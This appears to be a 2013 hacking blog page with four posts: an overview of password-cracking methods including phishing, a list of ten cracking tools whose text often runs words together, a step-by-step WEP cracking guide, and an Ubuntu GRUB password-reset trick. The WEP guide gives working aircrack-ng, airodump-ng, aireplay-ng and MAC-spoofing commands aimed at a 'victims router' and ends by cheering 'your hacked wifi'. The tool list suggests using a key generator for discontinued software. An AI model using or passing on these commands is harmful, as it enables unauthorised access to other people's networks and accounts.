Showing posts with label Password Creaking. Show all posts
Showing posts with label Password Creaking. Show all posts

Tuesday, 30 July 2013

Basic of Password Cracking for Beginner

Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.


Most passwords can be cracked by using following techniques :
1) Hashing :- 

Here we will refer to the one way function (which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password.
If a system uses a reversible function to obscure stored passwords, exploiting that weakness can recover even 'well-chosen' passwords.
One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length.
LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately.

Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly.


2) Guessing :- 


Many passwords can be guessed either by humans or by sophisticated cracking programs armed with dictionaries (dictionary based) and the user's personal information.

Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:

* blank (none)
* the word "password", "passcode", "admin" and their derivatives
* the user's name or login name
* the name of their significant other or another person (loved one)
* their birthplace or date of birth
* a pet's name
* a dictionary word in any language
* automobile licence plate number
* a row of letters from a standard keyboard layout (eg, the qwerty keyboard -- qwerty itself, asdf, or qwertyuiop)
* a simple modification of one of the preceding, such as suffixing a digit or reversing the order of the letters.
and so on....

In one survery of MySpace passwords which had been phished, 3.8 percent of passwords were a single word found in a dictionary, and another 12 percent were a word plus a final digit; two-thirds of the time that digit was.
A password containing both uppercase & lowercase characters, numbers and special characters too; is a strong password and can never be guessed.

Check Your Password Strength

3) Default Passwords :- 


A moderately high number of local and online applications have inbuilt default passwords that have been configured by programmers during development stages of software. There are lots of applications running on the internet on which default passwords are enabled. So, it is quite easy for an attacker to enter default password and gain access to sensitive information. A list containing default passwords of some of the most popular applications is available on the internet.
Always disable or change the applications' (both online and offline) default username-password pairs.

4) Brute Force :- 


If all other techniques failed, then attackers uses brute force password cracking technique. Here an automatic tool is used which tries all possible combinations of available keys on the keyboard. As soon as correct password is reached it displays on the screen.This techniques takes extremely long time to complete, but password will surely cracked.
Long is the password, large is the time taken to brute force it.

5) Phishing :- 


This is the most effective and easily executable password cracking technique which is generally used to crack the passwords of e-mail accounts, and all those accounts where secret information or sensitive personal information is stored by user such as social networking websites, matrimonial websites, etc.
Phishing is a technique in which the attacker creates the fake login screen and send it to the victim, hoping that the victim gets fooled into entering the account username and password. As soon as victim click on "enter" or "login" login button this information reaches to the attacker using scripts or online form processors while the user(victim) is redirected to home page of e-mail service provider.


Never give reply to the messages which are demanding for your username-password, urging to be e-mail service provider.

It is possible to try to obtain the passwords through other different methods, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse or virus, identity management system attacks (such as abuse of Self-service password reset) and compromising host security.
However, cracking usually designates a guessing attack.

Tuesday, 23 July 2013

Top 10 Password Cracking tool

1. Cainand Abel : The toppassword recovery toolfor Windows UNIX users often smuglyassert that the best freesecurity tools supporttheir platform first, andWindows ports are often
an afterthought. They are usually right, but Cain &Abel is a glaringexception. This Windows-only password recoverytool handles an enormousvariety of tasks. It can recover passwords bysniffing the network,cracking encryptedpasswords usingDictionary, Brute-Forceand Cryptanalysis attacks, recording VoIPconversations, decodingscrambled passwords,revealing passwordboxes, uncovering cachedpasswords and analyzing routing protocols
2. John theRipper : Apowerful, flexible, andfast multi-platformpassword hash cracker Johnthe Ripper is a fast password cracker,currently available formany flavors of Unix (11are officially supported,not counting differentarchitectures), DOS, Win32, BeOS, and OpenVMS. Itsprimary purpose is todetect weak Unixpasswords. It supportsseveral crypt(3) passwordhash types which are most commonly found onvarious Unix flavors, aswell as Kerberos AFS andWindows NT/2000/XP LMhashes
3. THC Hydra : A Fastnetwork authentication cracker which supportmany different services Whenyou need to bruteforce crack a remoteauthentication service,Hydra is often the tool of choice. It can performrapid dictionary attacksagainst more then 30protocols, including telnet,ftp, http, https, smb,several databases, and much more
4. Aircrack : Thefastestavailable WEP/WPAcracking tool Aircrack is a suiteof toolsfor 802.11a/b/g WEP and WPA cracking. It canrecover a 40 through 512-bit WEP key once enoughencrypted packets have beengathered. It can alsoattack WPA 1 or 2 networks using advancedcryptographic methods orby brute force. The suiteincludes airodump (an 802.11packet captureprogram), aireplay (an 802.11 packet injectionprogram), aircrack (staticWEP and WPA-PSKcracking), and airdecap(decrypts WEP/WPAcapture files)
5. L0phtcrack : Windowspassword auditing andrecovery applicationL0phtCrack, also knownas LC5, attempts to crackWindows passwords from hashes which it canobtain (given properaccess) from stand-aloneWindows NT/2000workstations, networkedservers, primary domain controllers, or ActiveDirectory. In some cases itcan sniff the hashes off thewire. It also hasnumerous methods ofgenerating password guesses (dictionary, bruteforce, etc). LC5 wasdiscontinued by Symantec in2006, but you can stillfind the LC5 installerfloating around. The free trial only lasts 15 days,and Symantec won't sellyou a key, so you'll eitherhave to cease using it orfind a key generator.Since it is no longer maintained, you areprobably better offtrying Cain and Abel, John theRipper, or Ophcrackinstead.
6. Airsnort : 802.11WEP Encryption Cracking ToolAirSnort is a wireless LAN(WLAN) tool thatrecovers encryption keys.It was developed by theShmoo Group and operates by passivelymonitoring transmissions,computing the encryptionkey when enoughpackets have beengathered. You may also be interested in the similarAircrack.
7. SolarWinds : Aplethoraof network discovery/monitoring/attack toolsSolarWinds has created and sells dozens of special-purpose tools targeted atsystems administrators.Security-related toolsinclude many networkdiscovery scanners, an SNMP brute-force cracker,router passworddecryption, a TCPconnection reset program,one of the fastest and easiestrouter config download/uploadapplications available andmore.
8. Pwdump : A windowpassword recovery toolPwdump is able to extractNTLM and LanMan hashes from a Windows target,regardless of whetherSyskey is enabled. It isalso capable of displayingpassword histories if theyare available. It outputs the data in L0phtcrack-compatible form, and canwrite to an output file.
9.RainbowCrack : AnInnovative PasswordHash Cracker The RainbowCrack tool isa hash cracker that makesuse of a large-scale time-memory trade-off. Atraditional brute forcecracker tries all possible plaintexts one by one,which can be timeconsuming for complexpasswords.RainbowCrack uses atime-memory trade-off to do all the cracking-timecomputation in advanceand store the results in so-called "rainbow tables". Itdoes take a long time toprecompute the tables but RainbowCrack can behundreds of times fasterthan a brute force crackeronce the precomputationis finished.
10 Brutus : Anetwork brute-force authenticationcracker This Windows-onlycracker bangs againstnetwork services ofremote systems trying toguess passwords by using a dictionary and permutationsthereof. Itsupports HTTP, POP3, FTP,SMB, TELNET, IMAP, NTP,and more. No source codeis available. UNIX users should take a look at THCHydra.

Wednesday, 6 March 2013

WEP Cracking with Backtrack

First, you will need to have Backtrack 5 (LINK)
*** I find it that if you are smart enough to be into hacking you will atleast know how to burn an image file to a DVD, so after you do that, boot up the DVD in the and run BT4.

Login: root
Password: toor


Once logged in, type in: startx
BT5 is now set up, heres the following.
==

WEP CRACK GUIDE


1. Open konsole and type the following to start up network connections.

/etc/init.d/networking start


2. Now we are going to put the network card into monter mode by typing the following.

airmon-ng

(You will find your Interface here)

3. So first start up the scan

airmon-ng start wlan0 or 1

(depends on what it reads your card as, replace as needed)

4.Lets spoof your MAC address first by typing this next command.

ifconfig wlan1 down
macchanger -r wlan1
ifconfig wlan1 up


This will make it so we change our MAC address to the computer we are connecting to

5.Time to start finding our victims router, type in konsole.

airodump-ng mon0

This will show the list and once you find one that suits your interest, Continue.

6. Once found press CTRL + C to copy the BSSID and then get out of airodump and then type into a new konsole

airodump-ng -c channel number, --bssid the BSSID of the router, -w what you want to save the cap file as, then mon0 (the interface we are using)

example: airodump-ng -c 1 - - bssid 11:22:33:44:55:66 -w wepcap mon0


7. Lets start the passkey cracking. We need to get around 20,000-50,000 IVs. We start by sending fake authentication requests. To do this open a new konsole and type:

aireplay-ng -1 1 -a The BSSID of the router, then the interface.
example: aireplay-ng -1 1 a 11:22:33:44:55:66 mon0


8. Almost done, we just need to contune the ARP cycle, open another konsole and type:

aireplay-ng -3 -b The BSSID of the router, then the interface, and it will start replaying ARPs.


Collect a good ammount of IVs like around 20k to 50k. Once its their, type CTRL - C to stop the process and continue to 9.

9. Time to start cracking that cap file :D Open a new konsole and type.

aircrack-ng -b (bssid) (file name)-01.cap
example: aircrack-ng 11:22:33:44:55:66 wepcap-01.cap


10. Now we should have the key to log in to the router, have fun enjoying your hacked wifi ;)

Monday, 18 February 2013

Ubuntu password reset/login trick

Reset Your Forgotten Ubuntu Password in 2 Minutes or Less

If you’ve ever forgotten your password, you aren’t alone… it’s probably one of the most common tech support problems I’ve encountered over the years. Luckily if you are using Ubuntu they made it incredibly easy to reset your password.

note:- I AM SHOWING UBUNTU 10.11


1 Reboot your computer, and then as soon as you see the GRUB Loading screen, make sure to hit the ESC key so that you can get to the menu. 

its look like this 

  2 Then press 'e'


3 You’ll want to remove the “ro quiet splash” part with the backspace key, and then add this onto the end:
rw init=/bin/bash
 I highlighted here 

 4 Then you have to do is press f10 key wait until you something like this



5 Then simply type cd /home  then its says "root@(none):/home#"  


6 Now type "ls" and press enter  this will show you the user name of system like this


7 now u have to do is type passwd <username> example in here its like passwd way2h   then press enter now its tell us to enter new password  for given user  simply type two times and done :) 


NOTE:- after u done this type
reboot –f  
I found that the –f parameter was necessary to get the reboot command to work for some reason. You could always hardware reset instead, but make sure to use the sync command first.

ONLY FOR YOUR INFORMATION